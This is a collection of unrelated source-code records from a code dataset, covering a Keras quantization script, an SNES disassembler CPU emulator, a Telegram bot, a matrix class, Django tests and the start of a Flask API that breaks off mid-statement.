'templates/custom_events', globals = { 'json' : json,\n 'tsToTime' : tsToTime,\n '_x_' : _x_,\n '_xm_' : _xm_,\n 'hex' : hex,\n 'sanitize' : sanitizeJson } )\n\nif len( sys.argv ) < 2:\n print( \"Usage: python app.py beach_config [listen_port]\" )\n sys.exit()\n\nbeach = Beach( sys.argv[ 1 ], realm = 'hcp' )\ndel( sys.argv[ 1 ] )\nmodel = beach.getActorHandle( 'models', nRetries = 3, timeout = 30, ident = 'lc/0bf01f7e-62bd-4cc4-9fec-4c52e82eb903' )\n\napp.run()","sub_path":"cloud/limacharlie/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"587626179","text":"# Copyright 2020 Google LLC\n#\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# 
==============================================================================\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport os\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"\"\n\nfrom args import ParserArgs\n\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.layers import Activation\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import to_categorical\nfrom lo import *\nimport numpy as np\n\nfrom qkeras import print_qstats\nfrom qkeras import QActivation\nfrom qkeras import QConv2D\nfrom qkeras import QDense\nfrom qkeras import quantized_bits\nfrom qkeras import ternary\n\n\nnp.random.seed(42)\nOPTIMIZER = Adam(lr=0.002)\nNB_EPOCH = 10\nBATCH_SIZE = 32\nVERBOSE = 1\nNB_CLASSES = 10\nN_HIDDEN = 100\nVALIDATION_SPLIT = 0.1\nRESHAPED = 784\n\n\ndef QDenseModel(weights_f, load_weights=False):\n \"\"\"Construct QDenseModel.\"\"\"\n\n x = x_in = Input((28*28,), name=\"input\")\n x = QActivation(\"quantized_relu(2)\", name=\"act_i\")(x)\n\n x = Dense(100, name=\"d0\")(x)\n x = BatchNormalization(name=\"bn0\")(x)\n\n x = QActivation(\"quantized_relu(2)\", name=\"act0_m\")(x)\n\n x = Flatten(name=\"flatten\")(x)\n\n x = QDense(\n NB_CLASSES,\n kernel_quantizer=quantized_bits(4, 0, 1),\n bias_quantizer=quantized_bits(4, 0, 1),\n name=\"dense2\")(x)\n x = Activation(\"softmax\", name=\"softmax\")(x)\n\n model = Model(inputs=[x_in], outputs=[x])\n model.summary()\n model.compile(loss=\"categorical_crossentropy\",\n optimizer=OPTIMIZER, metrics=[\"accuracy\"])\n\n if load_weights and weights_f:\n model.load_weights(weights_f)\n\n return model\n\n\ndef UseNetwork(weights_f, load_weights=False):\n \"\"\"Use DenseModel.\n\n Args:\n weights_f: weight file location.\n load_weights: load weights when it is True.\n \"\"\"\n model = QDenseModel(weights_f, load_weights)\n\n batch_size = BATCH_SIZE\n (x_train_, y_train_), (x_test_, y_test_) = mnist.load_data()\n\n x_train_ = x_train_.reshape(60000, 28*28)\n x_test_ = x_test_.reshape(10000, 28*28)\n x_train_ = x_train_.astype(\"float32\")\n x_test_ = x_test_.astype(\"float32\")\n\n x_train_ /= 256.\n x_test_ /= 256.\n\n # x_train_ = 2*x_train_ - 1.0\n # x_test_ = 2*x_test_ - 1.0\n\n print(x_train_.shape[0], \"train samples\")\n print(x_test_.shape[0], \"test samples\")\n\n y_train_ = to_categorical(y_train_, NB_CLASSES)\n y_test_ = to_categorical(y_test_, NB_CLASSES)\n\n if not load_weights:\n model.fit(\n x_train_,\n y_train_,\n batch_size=batch_size,\n epochs=NB_EPOCH,\n verbose=VERBOSE,\n validation_split=VALIDATION_SPLIT)\n\n if weights_f:\n model.save_weights(weights_f)\n\n score = model.evaluate(x_test_, y_test_, verbose=False)\n print(\"Test score:\", score[0])\n print(\"Test accuracy:\", score[1])\n\n return model, x_train_\n\n\nif __name__ == \"__main__\":\n args = ParserArgs()\n model, x_train = UseNetwork(args.weight_file, load_weights=args.load_weight)\n\n if args.logic_optimize:\n i_dict = get_quantized_bits_dict(2,0,0,mode=\"bin\" if args.use_pla else \"dec\")\n o_dict = get_quantized_bits_dict(2,0,0,mode=\"bin\" if args.use_pla else \"dec\")\n\n print(\"... 
generating table with {} entries\".format(x_train.shape[0]))\n\n files = optimize_dense_logic(\n model, args.i_name, args.o_name, x_train,\n i_dict, o_dict, output_group=args.output_group,\n samples=int(args.sample) if args.sample else x_train.shape[0],\n generate_pla=args.use_pla)\n\n if args.use_pla and args.run_abc:\n run_optimizer(args.i_name, files)\n\n","sub_path":"qkeras/experimental/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"438387798","text":"from copy import copy\nfrom typing import List, Optional, Tuple\n\nfrom gilgamesh.snes.instruction import (\n Instruction,\n InstructionID,\n RetIndirectType,\n StackManipulation,\n)\nfrom gilgamesh.snes.opcodes import AddressMode, Op\nfrom gilgamesh.snes.registers import Registers\nfrom gilgamesh.snes.state import State, StateChange, UnknownReason\nfrom gilgamesh.stack import Stack, StackEntry\nfrom gilgamesh.subroutine import Subroutine\n\n\nclass CPU:\n def __init__(self, log, pc: int, p: int, subroutine: int):\n self.log = log\n self.rom = log.rom\n\n # Processor state.\n self.pc = pc\n self.state = State(p)\n self.registers = Registers(self.state)\n self.stack = Stack()\n\n # Change in CPU state caused by the execution of the current subroutine.\n self.state_change = StateChange()\n # What we know about the CPU state based on the\n # sequence of instructions we have executed.\n self.state_inference = StateChange()\n\n # The subroutine currently being executed.\n self.subroutine_pc = subroutine\n # The stack of calls that brought us to the current subroutine.\n self.stack_trace: List[int] = []\n\n @property\n def instruction_id(self) -> InstructionID:\n # Get the ID of the instruction currently being executed\n # in the context of the current subroutine.\n return InstructionID(self.pc, self.state.p, self.subroutine_pc)\n\n @property\n def subroutine(self) -> Subroutine:\n return self.log.subroutines[self.subroutine_pc]\n\n def copy(self, new_subroutine=False) -> \"CPU\":\n # Copy the current state of the CPU.\n cpu = copy(self)\n cpu.state = copy(self.state)\n cpu.registers = self.registers.copy(cpu.state)\n cpu.stack = self.stack.copy() # TODO: check if necessary.\n cpu.stack_trace = copy(self.stack_trace)\n cpu.state_inference = copy(self.state_inference)\n # Don't carry over the state change information to new subroutines.\n cpu.state_change = StateChange() if new_subroutine else copy(self.state_change)\n return cpu\n\n def run(self) -> None:\n keep_going = self.step()\n while keep_going:\n keep_going = self.step()\n\n def step(self) -> bool:\n # We can't analyze code that lives in RAM.\n if self.rom.is_ram(self.pc):\n return False\n # Don't visit the exact same instruction twice.\n if self.log.is_visited(self.instruction_id):\n return False\n\n # Disassemble and log the instruction.\n opcode = self.rom.read_byte(self.pc)\n argument = self.rom.read_address(self.pc + 1)\n instruction = Instruction(\n self.log,\n *self.instruction_id,\n opcode,\n argument,\n self.registers.snapshot(),\n copy(self.state_change)\n )\n self.log.add_instruction(instruction)\n\n # Emulate the instruction.\n keep_going = self.execute(instruction)\n # Apply asserted state changes if any, and log it inside the instruction object.\n instruction.state_change_after = self._maybe_apply_asserted_state_change(\n instruction\n )\n\n return keep_going\n\n def execute(self, instruction: Instruction) -> bool:\n self.pc += 
instruction.size\n\n # See if we can learn something about the *required*\n # state of the CPU based on the current instruction.\n self._derive_state_inference(instruction)\n\n if instruction.is_return:\n return self.ret(instruction)\n elif instruction.is_interrupt:\n self._unknown_subroutine_state(\n instruction, unknown_reason=UnknownReason.SUSPECT_INSTRUCTION\n )\n return False\n elif instruction.is_jump:\n self.jump(instruction)\n return False\n elif instruction.is_call:\n return self.call(instruction)\n elif instruction.is_branch:\n self.branch(instruction)\n elif instruction.is_sep_rep:\n self.sep_rep(instruction)\n elif instruction.does_change_stack:\n self.change_stack(instruction)\n elif instruction.does_change_a:\n self.change_a(instruction)\n elif instruction.is_pop:\n return self.pop(instruction)\n elif instruction.is_push:\n self.push(instruction)\n\n return True # Keep executing in the context of this subroutine.\n\n def branch(self, instruction: Instruction) -> None:\n # Run a parallel instance of the CPU to follow\n # the case in which we don't take the branch.\n cpu = self.copy()\n cpu.run()\n\n target = instruction.absolute_argument\n assert target is not None\n\n # Log the fact that the current instruction references the\n # instruction pointed by the branch. Then take the branch.\n self.log.add_reference(instruction, target)\n self.pc = target\n\n def _calculate_targets(self, i: Instruction, targets):\n if not targets:\n if i.absolute_argument:\n return [(None, i.absolute_argument)]\n else:\n return self.log.jump_assertions.get(i.pc, None) or [(None, None)]\n else:\n return targets or [(None, None)]\n\n def call(self, i: Instruction, targets=None) -> bool:\n # Keep track of the state before the call.\n targets = self._calculate_targets(i, targets)\n saved_state, saved_state_change = copy(self.state), copy(self.state_change)\n possible_states = set()\n\n for _, target in targets:\n if target is None or self.rom.is_ram(target):\n # If we can't reliably derive the address of the subroutine\n # being called, we're left in an unknown state.\n return self._unknown_subroutine_state(\n i, unknown_reason=UnknownReason.INDIRECT_JUMP\n )\n\n # Run a parallel instance of the CPU to execute\n # the subroutine that is being called.\n cpu = self.copy(new_subroutine=True)\n call_size = 2 if i.operation in (Op.JSR, Op.RTS) else 3\n cpu.stack.push(i, i.pc, call_size)\n cpu.stack_trace.append(self.subroutine_pc)\n cpu.subroutine_pc = target\n cpu.pc = target\n\n # Emulate the called subroutine.\n self.log.add_reference(i, target)\n self.log.add_subroutine(target, stack_trace=cpu.stack_trace)\n cpu.run()\n\n # If we univocally know what the return state of the\n # called subroutine is, we can propagate it to the\n # current CPU state. 
Otherwise, to be on the safe\n # side, we need to stop the execution.\n known, unknown_reason = self._propagate_subroutine_state(i.pc, target)\n if known or self._unknown_subroutine_state(\n i, unknown_reason=unknown_reason\n ):\n possible_states.add((self.state, self.state_change))\n\n # Restore the state before this target was executed.\n self.state, self.saved_state_change = (\n copy(saved_state),\n copy(saved_state_change),\n )\n\n if i.has_asserted_state_change:\n return True\n\n for state, state_change in possible_states:\n cpu = self.copy()\n cpu.state, cpu.state_change = state, state_change\n cpu.run()\n return False\n\n def jump(self, i: Instruction, targets=None) -> None:\n targets = self._calculate_targets(i, targets)\n for _, target in targets:\n if target is None:\n self._unknown_subroutine_state(\n i, unknown_reason=UnknownReason.INDIRECT_JUMP\n )\n return\n\n self.log.add_reference(i, target)\n cpu = self.copy()\n cpu.pc = target\n cpu.run()\n\n def ret(self, i: Instruction) -> bool:\n def standard_return():\n self.log.add_subroutine_state(self.subroutine.pc, i.pc, self.state_change)\n return False\n\n if i.operation == Op.RTI:\n return standard_return()\n\n ret_size = 2 if i.operation == Op.RTS else 3\n stack_entries = self.stack.pop(ret_size)\n\n # Check for stack manipulations.\n stack_manipulator = self._check_stack_manipulation(i, stack_entries)\n if not stack_manipulator:\n return standard_return()\n\n # If the stack is constructed in such a way that\n # we would return to the next instruction, it is\n # effectively a subroutine call.\n if self.stack.match(i.pc, ret_size):\n i.ret_indirect_type = RetIndirectType.CALL\n self.log.assert_jump(i.pc, set_dirty=False)\n for s in self.stack.pop(ret_size):\n if s.instruction:\n s.instruction.stack_manipulation = StackManipulation.HARMLESS\n return self.call(i, self.log.jump_assertions[i.pc])\n\n # Otherwise, if we know this is a jump table, then it's a simple jump.\n elif i.is_jump_table:\n i.ret_indirect_type = RetIndirectType.JUMP\n for s in stack_entries:\n if s.instruction:\n s.instruction.stack_manipulation = StackManipulation.HARMLESS\n self.jump(i, self.log.jump_assertions[i.pc])\n return False\n\n # We don't know for certain that this is a jump table, signal\n # an unknown state.\n else:\n self._unknown_subroutine_state(\n i,\n unknown_reason=UnknownReason.STACK_MANIPULATION,\n stack_manipulator=stack_manipulator,\n )\n return False\n\n @staticmethod\n def _check_stack_manipulation(\n i: Instruction, stack_entries: List[StackEntry]\n ) -> Optional[Instruction]:\n # Check whether this return is operating on a manipulated stack.\n call_op = (Op.JSR, Op.RTS) if i.operation == Op.RTS else (Op.JSL, Op.RTL)\n # Non-call instructions which operated on the region of the\n # stack containing the return address from the subroutine.\n stack_manipulators = [\n s.instruction\n for s in stack_entries\n if not s.instruction or s.instruction.operation not in call_op\n ]\n if stack_manipulators:\n return stack_manipulators[-1]\n return None\n\n def sep_rep(self, instruction: Instruction) -> None:\n arg = instruction.absolute_argument\n assert arg is not None\n\n if instruction.operation == Op.SEP:\n self.state.set(arg)\n self.state_change.set(arg)\n else:\n self.state.reset(arg)\n self.state_change.reset(arg)\n\n # Simplify the state change by applying our knowledge\n # of the current state. I.e. 
if we know that the\n # processor is operating in 8-bits accumulator mode\n # and we switch to that same mode, effectively no\n # state change is being performed.\n self.state_change.apply_inference(self.state_inference)\n\n def change_a(self, i: Instruction) -> None:\n if i.address_mode == AddressMode.IMMEDIATE_M:\n assert i.argument is not None\n a = self.registers.a.get()\n\n if i.operation == Op.LDA:\n self.registers.a.set(i.argument)\n elif a is not None:\n if i.operation == Op.ADC:\n # TODO: handle carry flag.\n self.registers.a.set(a + i.argument)\n elif i.operation == Op.SBC:\n # TODO: handle negative flag.\n self.registers.a.set(a - i.argument)\n elif i.operation == Op.TSC:\n self.registers.a.set_whole(self.stack.pointer)\n elif i.operation == Op.PLA:\n self.stack.pop(self.state.a_size)\n else:\n self.registers.a.set(None)\n\n def change_stack(self, i: Instruction) -> None:\n if i.operation == Op.TCS:\n a = self.registers.a.get_whole()\n self.stack.set_pointer(i, a)\n if a is not None:\n return\n # We keep the disassembly going if the stack manipulation\n # doesn't otherwise influence the state of the processor.\n i.stack_manipulation = StackManipulation.HARMLESS\n\n def push(self, instruction: Instruction) -> None:\n if instruction.operation == Op.PHP:\n self.stack.push(instruction, (copy(self.state), copy(self.state_change)))\n elif instruction.operation == Op.PHA:\n self.stack.push(instruction, self.registers.a.get(), self.state.a_size)\n elif instruction.operation in (Op.PHX, Op.PHY):\n self.stack.push(instruction, size=self.state.x_size)\n elif instruction.operation in (Op.PHB, Op.PHK):\n self.stack.push(instruction)\n elif instruction.operation in (Op.PHD, Op.PEA, Op.PER):\n self.stack.push(instruction, size=2)\n else:\n assert False\n\n def pop(self, i: Instruction) -> bool:\n if i.operation == Op.PLP:\n entry = self.stack.pop_one()\n if entry.instruction and entry.instruction.operation == Op.PHP:\n self.state, self.state_change = entry.data\n # We can't trust the disassembly if we don't know\n # which state the PLP instruction is restoring.\n else:\n return self._unknown_subroutine_state(\n i,\n unknown_reason=UnknownReason.STACK_MANIPULATION,\n stack_manipulator=entry.instruction,\n )\n\n elif i.operation in (Op.PLX, Op.PLY):\n self.stack.pop(self.state.x_size)\n elif i.operation == Op.PLB:\n self.stack.pop_one()\n elif i.operation == Op.PLD:\n self.stack.pop(2)\n else:\n assert False\n return True\n\n def _derive_state_inference(self, instruction: Instruction) -> None:\n # If we're executing an instruction with a certain operand size,\n # and no state change has been performed in the current subroutine,\n # then we can infer that the state of the processor as we enter\n # the subroutine *must* be the same in all cases.\n if (\n instruction.address_mode == AddressMode.IMMEDIATE_M\n and self.state_change.m is None\n ):\n self.state_inference.m = self.state.m\n elif (\n instruction.address_mode == AddressMode.IMMEDIATE_X\n and self.state_change.x is None\n ):\n self.state_inference.x = self.state.x\n\n def _propagate_subroutine_state(\n self, call_pc: int, subroutine_pc: int\n ) -> Tuple[bool, UnknownReason]:\n known = True\n unknown_reason = UnknownReason.KNOWN\n\n # If the user defined a state assertion for the current instruction.\n if call_pc in self.log.instruction_assertions:\n return (known, unknown_reason) # Execution can proceed.\n\n # If the subroutine can return in more than one distinct state, or its\n # state is unknown, we can't reliably propagate the state to 
the caller.\n subroutine = self.log.subroutines[subroutine_pc]\n return_states = subroutine.simplify_return_states(self.state)\n\n # Multiple known return states.\n if len([s for s in return_states if not s.unknown]) > 1:\n known = False\n unknown_reason = UnknownReason.MULTIPLE_RETURN_STATES\n self.log.add_subroutine_state(\n self.subroutine_pc, call_pc, StateChange(unknown_reason=unknown_reason)\n )\n # Unknown state with some reason.\n elif any(s.unknown for s in return_states):\n known = False\n unknown_state = [s for s in return_states if s.unknown][0]\n unknown_reason = unknown_state.unknown_reason\n self.log.add_subroutine_state(self.subroutine_pc, call_pc, unknown_state)\n\n # Unique return state, apply it.\n if known:\n assert len(return_states) == 1\n self._apply_state_change(return_states.pop())\n\n return (known, unknown_reason)\n\n def _unknown_subroutine_state(\n self,\n instruction: Instruction,\n unknown_reason: Optional[UnknownReason] = None,\n stack_manipulator: Optional[Instruction] = None,\n ) -> bool:\n # Check if the user defined a state assertion for the current instruction.\n if instruction.pc in self.log.instruction_assertions:\n return True # Execution can proceed.\n\n # No custom assertion, we need to stop here.\n unknown_reason = unknown_reason or UnknownReason.UNKNOWN\n self.state_change = StateChange(unknown_reason=unknown_reason)\n self.log.add_subroutine_state(\n self.subroutine_pc, instruction.pc, copy(self.state_change)\n )\n\n # If the unknown state is due to stack manipulation:\n if unknown_reason == UnknownReason.STACK_MANIPULATION:\n # If we know which instruction performed the\n # manipulation, we flag it.\n if stack_manipulator:\n self.subroutine.has_stack_manipulation = True\n stack_manipulator.stack_manipulation = (\n StackManipulation.CAUSES_UNKNOWN_STATE\n )\n\n return False\n\n def _apply_state_change(self, state_change: StateChange) -> None:\n if state_change.m is not None:\n self.state_change.m = self.state.m = state_change.m\n if state_change.x is not None:\n self.state_change.x = self.state.x = state_change.x\n\n def _maybe_apply_asserted_state_change(self, i: Instruction) -> StateChange:\n \"\"\"Apply asserted state changes if any. 
Return the asserted\n state change if there is one, or a copy of the current state\n change otherwise.\"\"\"\n asserted_state = self.log.instruction_assertions.get(i.pc)\n if asserted_state:\n self._apply_state_change(asserted_state)\n return asserted_state\n else:\n return copy(self.state_change)\n","sub_path":"gilgamesh/snes/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":18291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"580815195","text":"import telegram\r\nimport datetime\r\nimport time\r\nimport sqlite3\r\nfrom telegram.ext import Updater\r\nfrom telegram.ext import CommandHandler\r\nfrom telegram.ext import MessageHandler, Filters, ConversationHandler, RegexHandler\r\nfrom functools import wraps\r\nfrom telegram import ChatAction, InlineKeyboardButton, ForceReply, KeyboardButton\r\nimport logging\r\nimport os\r\nimport psycopg2\r\n\r\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nLENGTH, WIDTH, HEIGHT = range(3)\r\n\r\nlength = 0\r\nwidth = 0\r\nheight = 0\r\n\r\ndef send_action(action):\r\n def decorator(func):\r\n @wraps(func)\r\n def command_func(*args, **kwargs):\r\n bot, update = args\r\n bot.send_chat_action(chat_id=update.effective_message.chat_id, action=action)\r\n return func(bot, update, **kwargs)\r\n return command_func\r\n \r\n return decorator\r\n\r\ndef cancel(bot, update):\r\n return ConversationHandler.END\r\n\r\ndef error(bot, update, error):\r\n logger.warning('Update \"%s\" caused error \"%s\"', update, error)\r\n\r\n#Code for LENGTH\r\n\r\ndef start(bot, update):\r\n bot.send_chat_action(chat_id=update.message.chat_id , action = telegram.ChatAction.TYPING)\r\n time.sleep(1)\r\n bot.send_message(chat_id=update.message.chat_id, text='Напишите *длину* индивидуальной упаковки', parse_mode=telegram.ParseMode.MARKDOWN)\r\n return LENGTH\r\n\r\ndef save_length(bot, update):\r\n length = update.message.text\r\n print(length)\r\n ask_width(bot, update)\r\n\r\n#Code for WIDTH\r\n\r\ndef ask_width(bot, update):\r\n bot.send_chat_action(chat_id=update.message.chat_id , action = telegram.ChatAction.TYPING)\r\n time.sleep(1)\r\n bot.send_message(chat_id=update.message.chat_id, text='Напишите *ширину* индивидуальной упаковки', parse_mode=telegram.ParseMode.MARKDOWN)\r\n return WIDTH\r\n\r\ndef save_width(bot, update):\r\n width = update.message.text\r\n print(width)\r\n ask_height(bot, update)\r\n\r\n#Code for HEIGHT\r\n\r\ndef ask_height(bot, update):\r\n bot.send_chat_action(chat_id=update.message.chat_id , action = telegram.ChatAction.TYPING)\r\n time.sleep(1)\r\n bot.send_message(chat_id=update.message.chat_id, text='Напишите *высоту* индивидуальной упаковки', parse_mode=telegram.ParseMode.MARKDOWN)\r\n return HEIGHT\r\n\r\ndef save_height(bot, update):\r\n height = update.message.text\r\n print(height)\r\n\r\ndef main():\r\n updater = Updater(token=\"TOKEN\")\r\n dispatcher = updater.dispatcher\r\n\r\n conv_handler = ConversationHandler(\r\n entry_points = [CommandHandler('start', start)],\r\n\r\n states = {\r\n LENGTH: [MessageHandler(Filters.text, save_length, pass_user_data=False)],\r\n WIDTH: [MessageHandler(Filters.text, save_width, pass_user_data=False)],\r\n HEIGHT: [MessageHandler(Filters.text, save_height, pass_user_data=False)]\r\n },\r\n\r\n fallbacks=[CommandHandler('cancel', cancel)]\r\n )\r\n\r\n dispatcher.add_handler(conv_handler)\r\n\r\n 
dispatcher.add_error_handler(error)\r\n\r\n updater.start_polling()\r\n updater.idle()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"535061907","text":"from random import uniform\r\n\r\n\r\nclass Matrix:\r\n def __init__(self, rows, cols):\r\n self.rows = rows\r\n self.cols = cols\r\n self.shape = (rows, cols)\r\n self.data = []\r\n for i in range(self.rows):\r\n self.data.append([])\r\n for j in range(self.cols):\r\n self.data[i].append(0)\r\n\r\n @staticmethod\r\n def from_array(array):\r\n # turns a 1 dimensional array into a 1 dimensional Matrix\r\n array_length = len(array)\r\n result = Matrix(array_length, 1)\r\n for i in range(array_length):\r\n result.data[i][0] = array[i]\r\n return result\r\n\r\n @staticmethod\r\n def from_array_2d(array):\r\n # turns a 2 dimensional array into a 2 dimensional Matrix\r\n array_rows = len(array)\r\n array_cols = len(array[0])\r\n result = Matrix(array_rows, array_cols)\r\n for i in range(array_rows):\r\n for j in range(array_cols):\r\n result.data[i][j] = array[i][j]\r\n return result\r\n\r\n def to_array(self):\r\n # turns a Matrix into an Array\r\n result = []\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n result.append(self.data[i][j])\r\n return result\r\n\r\n @staticmethod\r\n def subtract(a, b):\r\n\r\n # Subtracts each element of B form each element of A\r\n # A and B both should be matrices\r\n # also the shape of A and the shape of B should be equal\r\n\r\n if isinstance(a, Matrix) and isinstance(b, Matrix):\r\n if a.shape == b.shape:\r\n result = Matrix(a.rows, a.cols)\r\n for i in range(a.rows):\r\n for j in range(a.cols):\r\n result.data[i][j] = a.data[i][j] - b.data[i][j]\r\n return result\r\n else:\r\n print(\"!!! Inputs should be instances of Matrix\")\r\n return None\r\n\r\n def multiply(self, n):\r\n\r\n # If N is a Matrix it will multiply each element of your matrix by corresponding element in N\r\n # Note: the shape of N and the shape of your matrix should be the same\r\n\r\n if isinstance(n, Matrix):\r\n if self.shape == n.shape:\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n self.data[i][j] *= n.data[i][j]\r\n\r\n # If N is a number then your matrix will be multiplied by N\r\n else:\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n self.data[i][j] *= n\r\n\r\n @staticmethod\r\n def product(a, b):\r\n # Returns the dot product of two matrices\r\n # A and B both should be matrices\r\n # Th number of columns of A should be same as the number B rows\r\n\r\n if isinstance(a, Matrix) and isinstance(b, Matrix):\r\n if a.cols == b.rows:\r\n result = Matrix(a.rows, b.cols)\r\n for i in range(result.rows):\r\n for j in range(result.cols):\r\n temp_sum = 0\r\n for k in range(a.cols):\r\n temp_sum += a.data[i][k] * b.data[k][j]\r\n result.data[i][j] = temp_sum\r\n return result\r\n else:\r\n print(\"!!! 
Columns of first matrix must match row of the second matrix\")\r\n return None\r\n\r\n def add(self, n):\r\n # If N is a Matrix it adds each element of your matrix by corresponding element in N\r\n # Note: the shape of N and the shape of your matrix should be the same\r\n if isinstance(n, Matrix):\r\n if self.shape == n.shape:\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n self.data[i][j] += n.data[i][j]\r\n # If N is a number then it adds N to each element of your matrix\r\n else:\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n self.data[i][j] += n\r\n\r\n def map_function(self, func):\r\n # applies given function to each element of your matrix\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n val = self.data[i][j]\r\n self.data[i][j] = func(val)\r\n\r\n @staticmethod\r\n def map_function_static(mat, func):\r\n # applies given function to each element of the given matrix\r\n result = Matrix(mat.rows, mat.cols)\r\n for i in range(result.rows):\r\n for j in range(result.cols):\r\n val = mat.data[i][j]\r\n result.data[i][j] = func(val)\r\n return result\r\n\r\n @staticmethod\r\n def transpose(mat):\r\n # transposes the given matrix\r\n # in other words it Reverses the axes of the given matrix\r\n result = Matrix(mat.cols, mat.rows)\r\n for i in range(mat.rows):\r\n for j in range(mat.cols):\r\n result.data[j][i] = mat.data[i][j]\r\n return result\r\n\r\n def randomize(self):\r\n # initializes you matrix with random numbers between -1 and 1\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n self.data[i][j] = uniform(-1, 1)\r\n","sub_path":"matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"159088738","text":"#!/usr/bin/env python3\nimport subprocess\nfrom argparse import ArgumentParser, FileType\n\n\ndef requirements():\n parser = ArgumentParser()\n parser.add_argument(\n \"--requirements-file\",\n type=FileType(\"w\"),\n default=\"requirements.txt\",\n )\n # fetch list of changed files passed by pre-commit\n parser.add_argument(\"changed_pipfiles\", nargs=\"+\")\n args, extra_args = parser.parse_known_args()\n subprocess.run([\"pipenv\", \"requirements\", *extra_args], stdout=args.requirements_file)\n\n\ndef verify():\n subprocess.run([\"pipenv\", \"verify\"])\n","sub_path":"pipenv_lock_pre_commit.py","file_name":"pipenv_lock_pre_commit.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"232876319","text":"\"\"\"\nThis file demonstrates writing tests using the unittest module. 
These will pass\nwhen you run \"manage.py test\".\n\nReplace this with more appropriate tests for your application.\n\"\"\"\n\nfrom django.test import TestCase\nfrom contacts.models import Contact\n\nclass SimpleTest(TestCase):\n def test_basic_addition(self):\n \"\"\"\n Tests that 1 + 1 always equals 2.\n \"\"\"\n self.assertEqual(1 + 1, 2)\n\nclass ContactTests(TestCase):\n def test_str(self):\n c = Contact(first_name='Joe', last_name='Doe')\n self.assertEqual(str(c), 'Joe Doe')\n\nfrom django.test.client import RequestFactory\nfrom contacts.views import ContactListView\n\nclass ContactListViewsTest(TestCase):\n\n def test_no_contacts_in_context(self):\n factory = RequestFactory()\n request = factory.get('/')\n\n response = ContactListView.as_view()(request)\n self.assertEqual(\n list(response.context_data['object_list']),\n [],\n )\n\n def test_contact_in_context(self):\n factory = RequestFactory()\n request = factory.get('/')\n\n c = Contact.objects.create(first_name='Some', last_name='More', email='artem@gmail.com')\n response = ContactListView.as_view()(request)\n self.assertEqual(\n list(response.context_data['object_list']),\n [c],\n )\n\n def test_contacts_in_context(self):\n factory = RequestFactory()\n request = factory.get('/')\n\n c = Contact.objects.create(first_name='Some', last_name='More', email='artem@gmail.com')\n d = Contact.objects.create(first_name='New', last_name='One', email='arty@gmail.com')\n response = ContactListView.as_view()(request)\n self.assertEqual(\n list(response.context_data['object_list']),\n [c, d],\n )\n\nfrom django.test import LiveServerTestCase\nfrom selenium.webdriver.firefox.webdriver import WebDriver\n\nclass CreateContactIntegrationTest(LiveServerTestCase):\n @classmethod\n def setUpClass(cls):\n cls.selenium = WebDriver()\n super(CreateContactIntegrationTest, cls).setUpClass()\n\n @classmethod\n def tearDownClass(cls):\n cls.selenium.quit()\n super(CreateContactIntegrationTest, cls).tearDownClass()\n\n def test_add_contact(self):\n\n self.selenium.get('%s/new' % (self.live_server_url, ))\n self.selenium.find_element_by_id('id_first_name').send_keys(\"Joey\")\n self.selenium.find_element_by_id('id_last_name').send_keys(\"Smith\")\n self.selenium.find_element_by_id('id_email').send_keys(\"joey@joeysmith.com\")\n self.selenium.find_element_by_xpath(\"//input[@type='submit']\").click()\n\n self.assertEqual(Contact.objects.all()[0].first_name, 'Joey')\n","sub_path":"contacts/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"249997350","text":"import datetime\nimport hashlib\n\nfrom flask import Flask, request, abort, json\nfrom flask_cors import CORS\nimport connection\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\napp = Flask(__name__)\nCORS(app)\napi_version = \"API_KOPERASI Ver 2017.9 By Eng | (c) Copyrights Enggar 2017\"\nnow = datetime.datetime.now()\n\n# PETUGAS DAN ANGGOTA\n@app.route('/register_petugas_get_id', methods=[\"GET\",])\ndef register_petugas_get_id():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n 